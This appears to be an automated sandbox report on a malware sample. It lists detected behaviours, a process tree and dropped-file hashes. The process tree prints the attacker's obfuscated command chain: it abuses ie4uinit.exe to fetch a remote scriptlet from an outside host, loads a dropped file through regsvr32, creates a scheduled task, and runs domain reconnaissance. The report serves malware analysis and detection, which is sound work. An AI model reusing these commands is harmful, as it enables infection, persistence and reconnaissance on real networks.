Analysis
-
max time kernel
1189s -
max time network
1153s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
-
submitted
10-07-2023 19:08
General
-
Target
Untitled Document 5
-
Size
2B
-
MD5
b026324c6904b2a9cb4b88d6d61c81d1
-
SHA1
e5fa44f2b31c1fb553b6021e7360d07d5d91ff5e
-
SHA256
4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865
-
SHA512
3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686
Malware Config
Signatures
-
Process spawned unexpected child process 15 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Executes dropped EXE 3 IoCs
-
Loads dropped DLL 1 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Drops file in Program Files directory 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies Internet Explorer settings 1 TTPs 64 IoCs
-
Modifies data under HKEY_USERS 2 IoCs
-
Modifies registry class 2 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Runs net.exe
-
Script User-Agent 12 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 21 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Untitled Document 5"1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffaf8249758,0x7ffaf8249768,0x7ffaf82497782⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1680 --field-trial-handle=1884,i,11312466511097012692,17445214508716185742,131072 /prefetch:22⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1800 --field-trial-handle=1884,i,11312466511097012692,17445214508716185742,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1812 --field-trial-handle=1884,i,11312466511097012692,17445214508716185742,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3136 --field-trial-handle=1884,i,11312466511097012692,17445214508716185742,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3168 --field-trial-handle=1884,i,11312466511097012692,17445214508716185742,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=1668 --field-trial-handle=1884,i,11312466511097012692,17445214508716185742,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4592 --field-trial-handle=1884,i,11312466511097012692,17445214508716185742,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4892 --field-trial-handle=1884,i,11312466511097012692,17445214508716185742,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5044 --field-trial-handle=1884,i,11312466511097012692,17445214508716185742,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5172 --field-trial-handle=1884,i,11312466511097012692,17445214508716185742,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5212 --field-trial-handle=1884,i,11312466511097012692,17445214508716185742,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5476 --field-trial-handle=1884,i,11312466511097012692,17445214508716185742,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5708 --field-trial-handle=1884,i,11312466511097012692,17445214508716185742,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4664 --field-trial-handle=1884,i,11312466511097012692,17445214508716185742,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4192 --field-trial-handle=1884,i,11312466511097012692,17445214508716185742,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5108 --field-trial-handle=1884,i,11312466511097012692,17445214508716185742,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3416 --field-trial-handle=1884,i,11312466511097012692,17445214508716185742,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3980 --field-trial-handle=1884,i,11312466511097012692,17445214508716185742,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=4988 --field-trial-handle=1884,i,11312466511097012692,17445214508716185742,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5624 --field-trial-handle=1884,i,11312466511097012692,17445214508716185742,131072 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\resume\" -spe -an -ai#7zMap14777:74:7zEvent192811⤵
- Suspicious use of FindShellTrayWindow
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /v /c set "Networks9=President" && call set "Networks6=%Networks9:~3,1%" && !Networks6!et "Networks58=t" && (for %m in (c) do @set "Networks00=%~m") && !Networks6!et "Networks32=default" && !Networks6!et "Networks1=init" && (for %c in (a) do @set "Networks77=%~c") && !Networks6!et "Networks3=version" && !Networks6!et "Networks96=e" && !Networks6!et "Networks4=$w" && !Networks6!et "Networks93=si" && !Networks6!et "Networks80=." && !Networks6!et "Networks52=settings" && !Networks6!et "Networks85=d" && !Networks6!et "Networks60=a" && !Networks6!et "Networks09=!Networks80!inf" && !Networks6!et "Networks20=ieu!Networks1!!Networks09!" && c!Networks60!ll !Networks6!et "Networks5=%!Networks77!ppd!Networks60!ta%\micro!Networks6!oft\" && !Networks6!et "Networks7=!Networks5!!Networks20!" && (for %l in ("[!Networks3!]" "signature = !Networks4!indows nt$" "[!Networks85!e!Networks6!tinationdirs]" "2518=01" "!Networks32!destdir=11" "[!Networks32!in!Networks6!tall.windows7]" "!Networks85!elfil!Networks96!s=2518" "Un\" "Register\" "OCXs=C50A" "[2518]" "ieu%Networks34%!Networks09!" "[C50A]" "sc\" "ro%Networks71%j,NI,%Networks0%%Networks11%%Networks11%p%Networks41%%Networks2%%Networks2%jameslachman!Networks80!%Networks24%/wjgviwkk" "[!Networks6!!Networks58!rings]" "Networks34=!Networks1!" "Networks11=t;Networks30" "Networks2=/" "Networks90=%time%" "Networks24=com" "!Networks6!ervicen!Networks77!me=' '" "Networks41=:;Networks84" "!Networks6!hortsvcn!Networks77!me=' '" "Networks71=b;Networks83" "Networks0=h" ) do @e!Networks00!ho %~l)>"!Networks7!" && !Networks6!et "Networks19=ie4u!Networks1!.!Networks96!xe" && call xcopy /Y /C /Q %win!Networks85!ir%\!Networks6!ystem32\!Networks19! "!Networks5!*" | !Networks6!et Networks14=Direct && !Networks6!t!Networks77!rt "" wmi!Networks00! proce!Networks6!s call !Networks00!rea!Networks58!e "!Networks5!!Networks19! -base!Networks52!" | !Networks6!et "Networks95=Faith Mothers Custom Materials Months Trucks Sciences Holmes Adidas Instances Course Attend Places Causes Steps Uncover Buyer Fruits Bubble Exact Automobiles Ranch Robust Behind Leopard Cartridges Peripherals Frequent Fabric Scene Bounce Steel Recipes Constitutes Flows Toward Mention Recorders Damage Minor Essentials Prefers"1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\Admin\AppData\Roaming\microsoft\*" "2⤵
-
C:\Windows\system32\xcopy.exexcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\Admin\AppData\Roaming\microsoft\*"3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" set Networks14=Direct "2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\Admin\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" "2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process call create "C:\Users\Admin\AppData\Roaming\microsoft\ie4uinit.exe -basesettings"3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" set "Networks95=Faith Mothers Custom Materials Months Trucks Sciences Holmes Adidas Instances Course Attend Places Causes Steps Uncover Buyer Fruits Bubble Exact Automobiles Ranch Robust Behind Leopard Cartridges Peripherals Frequent Fabric Scene Bounce Steel Recipes Constitutes Flows Toward Mention Recorders Damage Minor Essentials Prefers""2⤵
-
-
C:\Users\Admin\AppData\Roaming\microsoft\ie4uinit.exeC:\Users\Admin\AppData\Roaming\microsoft\ie4uinit.exe -basesettings1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies Internet Explorer settings
-
C:\Users\Admin\AppData\Roaming\microsoft\ie4uinit.exeC:\Users\Admin\AppData\Roaming\microsoft\ie4uinit.exe -ClearIconCache2⤵
- Executes dropped EXE
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /03⤵
-
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /03⤵
-
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s /n /i:Execute "C:\Users\Admin\AppData\Roaming\Microsoft\44373.drv"1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\regsvr32.exe/s /n /i:Execute "C:\Users\Admin\AppData\Roaming\Microsoft\44373.drv"2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exe/Delete /F /TN "B491CA23DFA0F4"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exe/Create /TN "B491CA23DFA0F4" /XML "C:\ProgramData\Microsoft\912356B7FA.txt"3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\cmd.exe/v /c set "kyfhgpe494=dialogs" && call set "kyfhgpe7=%kyfhgpe494:~6,1%" && !kyfhgpe7!et "kyfhgpe2=d" && c!kyfhgpe2! /!kyfhgpe2!"C:\Users\Admin\AppData\Roaming\Microsoft\" && !kyfhgpe2!el "44373.drv"3⤵
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding1⤵
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\ProgramData\Microsoft\msxsl.exeC:\ProgramData\Microsoft\msxsl.exe 892952CD692.txt 892952CD692.txt1⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Windows\system32\typeperf.exetypeperf.exe "\System\Processor Queue Length" -si 60 -sc 11⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.execmd /v /c calx & exit1⤵
- Process spawned unexpected child process
-
C:\Windows\system32\typeperf.exetypeperf.exe "\System\Processor Queue Length" -si 60 -sc 11⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.execmd /v /c nltest /trusted_domains > "C:\Users\Admin\AppData\Local\Temp\27037.txt" 2>&11⤵
- Process spawned unexpected child process
-
C:\Windows\system32\nltest.exenltest /trusted_domains2⤵
-
-
C:\Windows\system32\typeperf.exetypeperf.exe "\System\Processor Queue Length" -si 60 -sc 11⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.execmd /v /c net group /domain "Domain Admins" > "C:\Users\Admin\AppData\Local\Temp\63177.txt" 2>&11⤵
- Process spawned unexpected child process
-
C:\Windows\system32\net.exenet group /domain "Domain Admins"2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 group /domain "Domain Admins"3⤵
-
-
-
C:\Windows\system32\typeperf.exetypeperf.exe "\System\Processor Queue Length" -si 60 -sc 11⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.execmd /v /c whoami /upn > "C:\Users\Admin\AppData\Local\Temp\45921.txt" 2>&11⤵
- Process spawned unexpected child process
-
C:\Windows\system32\whoami.exewhoami /upn2⤵
-
-
C:\Windows\system32\typeperf.exetypeperf.exe "\System\Processor Queue Length" -si 60 -sc 11⤵
- Process spawned unexpected child process
-
C:\Windows\system32\typeperf.exetypeperf.exe "\System\Processor Queue Length" -si 60 -sc 11⤵
- Process spawned unexpected child process
-
C:\Windows\system32\typeperf.exetypeperf.exe "\System\Processor Queue Length" -si 60 -sc 11⤵
- Process spawned unexpected child process
-
C:\Windows\system32\typeperf.exetypeperf.exe "\System\Processor Queue Length" -si 60 -sc 11⤵
- Process spawned unexpected child process
-
C:\Windows\system32\typeperf.exetypeperf.exe "\System\Processor Queue Length" -si 60 -sc 11⤵
- Process spawned unexpected child process
-
C:\Windows\system32\typeperf.exetypeperf.exe "\System\Processor Queue Length" -si 60 -sc 11⤵
- Process spawned unexpected child process
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Windows\System32\Tasks\B491CA23DFA0F42⤵
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
78KB
MD523abc4c31a382c27e5f3d1b83c5fbd56
SHA14abf0709af1d1b12499fc123c87fa78a7aa6b15a
SHA256384de2a59329d9e9460f1ebd234366df4e070dbb66ab4876fac76b46bf2d00c7
SHA5120cd529818781300fc67e5d3efba5b900cec1f655b9b51d01862762c189d32f4650fff793fcfe986bcd00ee02e0b491e9bf25cde210304ae71a72ab980fbd686e
-
Filesize
1KB
MD572e0caa41f5827ab0915f235d24a678f
SHA11b6467aad8244a3bfd2c43f13b65a82a30f3a2f6
SHA256341b2af6ca3d2fef233183727b9a7fcbefb228d8a5e6bf511076e0835211ad1f
SHA512c393d0ceceece0c26b13b36370b6d85ee9906a1bf850f3e5d4bc2def4bb87e71abc934c3338d7a217c14d3b73c2cd0d13f46946f97f8940fe9c166993784749c
-
Filesize
24KB
MD53e9f31b4e2cd423c015d34d63047685e
SHA18b516e7be14172e49085c4234c9a53c6eb490a45
SHA25635ba7624f586086f32a01459fcc0ab755b01b49d571618af456aa49e593734c7
SHA512cf36d14671d16b0f083ff85907661e045c00dcce46168f26188e22494eb7dd201614ddb1ea8cb82a87604c579ab4067710744b317eb6ff27c0e1a9c5cd8356c0
-
Filesize
24KB
MD53e9f31b4e2cd423c015d34d63047685e
SHA18b516e7be14172e49085c4234c9a53c6eb490a45
SHA25635ba7624f586086f32a01459fcc0ab755b01b49d571618af456aa49e593734c7
SHA512cf36d14671d16b0f083ff85907661e045c00dcce46168f26188e22494eb7dd201614ddb1ea8cb82a87604c579ab4067710744b317eb6ff27c0e1a9c5cd8356c0
-
Filesize
6KB
MD528c2c021f9f79ef60cce8c76d69b9713
SHA1ddcbf869683a14f45bb2231a0042d0ab92528735
SHA256eca9dd524bc5bf5d872f6161cd95200c9513bcfc74fd6f6a1e69e1f708a01236
SHA5123a818d150528dc7623f64b7a8f610bda2bb96577a962bff572d326e7d0cbe79ccb75094a50fef8b6daa5d217197421a1060e401a220354430b7346fe850d7b96
-
Filesize
171KB
MD57a88e1edbba1ad7bd345eb14f1377a59
SHA1b299cf2eacc2d17d1f2fbda9391079b6f05fb022
SHA2563f6aa29738172f431b8e2af2e39cba0c2f91583d7bc23f988c7b7b35975bef2c
SHA51248870540a5e7aedf4513610e23dad5d37ff48dde92909345771f7235d4526893e65d11915b46191e62dbe6e9bed4626215703fc90932bdebed356568c1557f95
-
Filesize
168B
MD5563ef00f477e1fe26518cdc5078a89d7
SHA15fc23b3af16d7c4602852170a2e304537b9d6713
SHA25657aba16fa4dbc0e95c749876cda1370b02ebe77b819af379281de95340951dcb
SHA5129c36e9deb4d9bd6fcd353350fe9748a5ca4f13f196cb33e68b69adf63a1b9d1e0c44d791adb73ffb1996af86a8361b92ba0b167bbc34756bba5874fffaaeb5c6
-
Filesize
168B
MD5c41b0adb484e4e1182c26975558e7ed5
SHA1e9a50dc3c96b3b21b54c5508867391cbfaa2bb49
SHA25633ac0f8e2bda153d62155506f046f34e8241e7b4b9693a6f0b3a9fc8c62a1b3c
SHA5125271668ca0161de1f5f7b6ec0a6256aaaff010880ed09ba060b1f89255a3e342aa5fd5253d3b8bceb707633024983da7a437333955296b69a7d14e04002e3bf2
-
Filesize
2KB
MD564538e422298406195b2c5025a97a121
SHA1e94d95a7d4bbad3ccb25e5c52c2644a6bd98d0fb
SHA25670f2fc49c25db637bd56355d4f103f60fe197d6056db680754b329e114ee266a
SHA51231bfdf9e800fb809d63e829d02f96b16b4629b3ebc727377125627c21d4c659f68862c3f1c37c87cb23fb22e79fd8c936644f211e5d65e46f38e4cebd4ba77db
-
Filesize
2KB
MD5ed9940d7e49d364aac18f3cf7b547ab6
SHA1d1a4a7292ef5defc66c0833d23a5365765181359
SHA2563b18cadc91e90a592067eea28d99fd74fbe27109fd3ad46178ad5d2263699697
SHA51292951a0ea6297036460167607620df400d6d0bc2d5c1a208c1e9f5eb1dbc52ea9dc39796b39f36d487d258b755fb657b98a090979bc7d4c708e31a472056dc35
-
Filesize
2KB
MD5f39ce3b4bd783334593fd12eec14b699
SHA1d074bc674e40c55a826e9a5ce37b1b2a20d5629b
SHA25680556d14bb7658474769598d4028b0880749c60d15e876402115176550408b63
SHA512df1159e8721ffc63642b4453cdbf138b313c0bce481ae327a784628d4cc09d7fe429cfd09609b110324116816c9e2a1936cde0e30ad3748f91ea32bcf05ac123
-
Filesize
2KB
MD5e96f9623c6b7a9ea46d53d126e5405c3
SHA12fa1f4c9158689d36ace99a28117b14946638d03
SHA2565d81be665fa4fabcdb5fd42522143c0a77ee985963cdaafc9aa90473cdaf9937
SHA5129d2f40e129e1f83e4d4b6ab65ebbbba80c5e437aad0548aa284d20aa03c8029121a3e4ce371c4b60dbdcb9ae146b52bb72223affa4ac06f2dc046f5f66d9e62e
-
Filesize
371B
MD59d89cce09049eee7bc9bae32e831ff03
SHA17571f5dc1b3ac83773692f9e2fc721b60f16a9e3
SHA2564de641fc362ee1b592090113e5e176cfe805ded6ecf43042d969d3ca1cd61ed0
SHA512fa575753da63a6814f829c8f1a1483d057a278a21c149e74323a1b8814bef719bb7f2ef629a0b06826c378a0af6e824bb8cd05cd0e3dabd5f045b040e3d75132
-
Filesize
538B
MD54975efaee35f627862b5cf85da4902aa
SHA1ee4eea618d898622090d63ab078f0b42d45dcd70
SHA2568b5bdf82d03db3edc69d9874c7e028b968c31a6d5774d84ea4fd1ba98e5d6df4
SHA51259c915576873d1abd68c9a6980d00767774afe0f5ea2a08aa483e352e522e850ee847e2a0b9dccddf348ab5825e86b765f7697882a08bd377925dc02f1c94320
-
Filesize
5KB
MD59700a9f8680e57ef578aaa50e0b4b329
SHA1fe5dd5e1c29503ecfe0baeabff55e236b63560d1
SHA2563360031315e242720a37295b904402427980e16eecf1052085841546dbdd04c2
SHA51237a04b657b7c60e6b4bbcaaf7e4e58c15483468cdb54e738fb7bc05bbbf74df42db5ffc16f2c8768a104090e5577f49029426bd17f068f389d33b02934608271
-
Filesize
5KB
MD5fceb73b4a4cf40e25d4b41fd99513a19
SHA1cdeb9a884d6eb99b0b2450110e01c3473d73d4a5
SHA256034d4a49ebb0b59696e7f68ad91bd8545e3b192cc3c2562edb5c6a951f267c81
SHA512c3e4b5787a3247598a90219cebbc5790398ed38fae83b7e73f692bbe0f46613635c61590121820fa288301f9cc04a2b2fbe3390799678d6b8065aebe24874b48
-
Filesize
6KB
MD5bfa96c1519d4c9a1a83501c7092f0ee6
SHA1131404d238ccc84bebdad6257fc50cb498f4ca0b
SHA256dc6cfece29f73b4d381c64447aace8df17581ba93d052b27bf4be9d0fe047e60
SHA512aaec965cdfd3f833311689c41ee92da054556640e711873de136ceb79f0f3f48f846ef21553df6d9aba3300d4579c7f0f3c97a9f7fea13b692e0d2da2c19653d
-
Filesize
264KB
MD5fdbb73baa49bdc70b934e5c7c4369e04
SHA153a2ec861995a111c5756689e1149fb733b4f196
SHA256a8fd3513a8b6eaa12ebe9e7643df0fb34680632721b2ee4c053a57dbdd15b6e0
SHA512fe50940c696dc1badb5b5f52e19c1b63a4de9b56f56a97002a9cb5f8f742b0056636b3da417c44fce875d575c12d0c312eab2441afb7f53dd27dfe2f502d401e
-
Filesize
172KB
MD5b46c053e063ad8143cf723c138b09501
SHA130fc3623e8ed04b37ae4391c125d2ee31858ec49
SHA2566e01a4fb4900ca4bad0f00c15d5454bdf48b1f5ee90ef76dd9f10ba86a7d2558
SHA512a42fc6f97471b1e76e2eea9379e89f50b1777cac663fae0cedd553f54142c5a2213eed31751a2146b2f29d1dbc0e2c4fa8d49159e8b057f6ef6be827bacf77cf
-
Filesize
172KB
MD570b216f823273be7937feb704fc5b443
SHA16e76b76276aecd1ef02040500dd905b021dc28d0
SHA2565c67dbbe19d4f827f3f47ddf749c5065c6955aa396f332bd0202a9fad42d7b39
SHA5128e7e19c60c7736423a9aaedf2da1d86ca125b3326e9875eebab8cb9a95736dc8a209ac7e6463c8bc33df90c0208848fc6df2cf06546ff63c5434251c78810e66
-
Filesize
110KB
MD58846479e7d6c66b31b0403ca86c6d217
SHA14bfc34520832c5988fbc375d910eb6230d26913d
SHA2560ec2318761780ccdde69a245d05ec2515c91e1edb9afe63565a207f731f9dfb8
SHA51205b6680d1e3b254e5dbcab0fe33c181c6b5456be2abd8ce1f76835023edbe8f1a13b5584b679bc35c7d775f7c4bbc1f27d598dfc5d0e3ac484687f708f1985b9
-
Filesize
101KB
MD5d2a552a3f0fecf131f45fde5968e5ee9
SHA1504382ea124aefe67cea6e8d086645112e88f58f
SHA2563d0259fcffb22418c0c35803d29e3af974d67546b28cdf0483d1e421d25e036f
SHA5126d263a8b1777818fcdb9aa35f60c3196aadeef3c28e7e4db5d6b50f5be08fa01593a996397f2046ba37c34e8a5f1bb514ce0088e86383db697efdc3b79ea8cea
-
Filesize
98KB
